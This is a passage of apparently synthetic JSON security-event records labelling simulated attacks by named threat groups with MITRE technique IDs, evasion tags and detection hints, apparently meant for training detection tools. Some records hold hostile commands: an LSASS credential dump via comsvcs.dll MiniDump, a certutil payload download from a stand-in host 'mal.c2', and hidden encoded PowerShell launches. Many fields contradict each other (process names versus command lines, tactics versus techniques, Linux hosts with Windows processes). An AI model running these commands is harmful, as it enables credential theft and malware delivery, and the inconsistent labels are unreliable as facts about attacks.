(DS0024)","timestamp":"2025-03-14T07:43:05.000Z","user":{"name":"CORP\\mgna4afjg85c","sid":"S-1-5-21-714203436-143872666-8322"}}
|
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1021.006 using fileless technique.","sub_technique":"Windows Remote Management","tactic":["Execution"],"technique_id":"T1021.006"},"event_id":"evt_unc4841_20250103T094613000Z_0000791","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["Base64","Fileless","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.127.13.192","name":"IAM-ROLE-APX09F6HXF","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"791UNC4841T1021.006"},"network":{"domain":"github.com","dst_ip":"1.126.78.139","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2025-11-10T11:09:17.000Z","user":{"name":"i-f1vb3p212zq4","sid":"S-1-5-21-296533698-975100297-4579"}}
|
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1003.001 using encrypted C2 technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Persistence","Execution","Collection"],"technique_id":"T1003.001"},"event_id":"evt_apt29_20260714T180305000Z_0000793","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["TLS","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.213.244.61","name":"WIN-FIN-SRV-3WHWSU8VPG","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"793APT29T1003.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.106.7.229","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1582 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-02-20T18:02:35.000Z","user":{"name":"svc_m8ydeq7jeylf","sid":"S-1-5-21-902589473-654995332-8493"}}
|
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1021.006 using encrypted C2 technique.","sub_technique":"Windows Remote Management","tactic":["Impact","Defense Evasion"],"technique_id":"T1021.006"},"event_id":"evt_unc4841_20260122T030639000Z_0000795","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.83.177.29","name":"APP-WEB-TF5TH0PMEP","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"795UNC4841T1021.006"},"network":{"domain":"github.com","dst_ip":"1.40.38.216","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"certutil.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-06-15T14:35:58.000Z","user":{"name":"arn:aws:iam::wmfxdzdnmr6t","sid":"S-1-5-21-742788964-371996590-9458"}}
|
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1570 using encrypted C2 technique.","sub_technique":"Lateral Tool Transfer","tactic":["Exfiltration"],"technique_id":"T1570"},"event_id":"evt_lapsus_20260507T001601000Z_0000797","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["WMI","Fileless","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.182.207.29","name":"DB-ORACLE-LNHKJDBMID","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"797Lapsus$T1570"},"network":{"domain":"aws.amazon.com","dst_ip":"1.23.29.81","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"bitsadmin.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-10-27T01:49:26.000Z","user":{"name":"svc_u6nhe482551a","sid":"S-1-5-21-173182785-757761563-7121"}}
|
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1531 using cloud-native technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Collection","Defense Evasion"],"technique_id":"T1531"},"event_id":"evt_lapsus_20251121T225131000Z_0000799","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["WMI","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.134.77.95","name":"EC2-INST-7Y2YROWRFY","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"799Lapsus$T1531"},"network":{"domain":"aws.amazon.com","dst_ip":"1.186.246.114","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-07-14T07:00:28.000Z","user":{"name":"azuread\\rfejnu80fm6c","sid":"S-1-5-21-763432038-939931877-1349"}}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.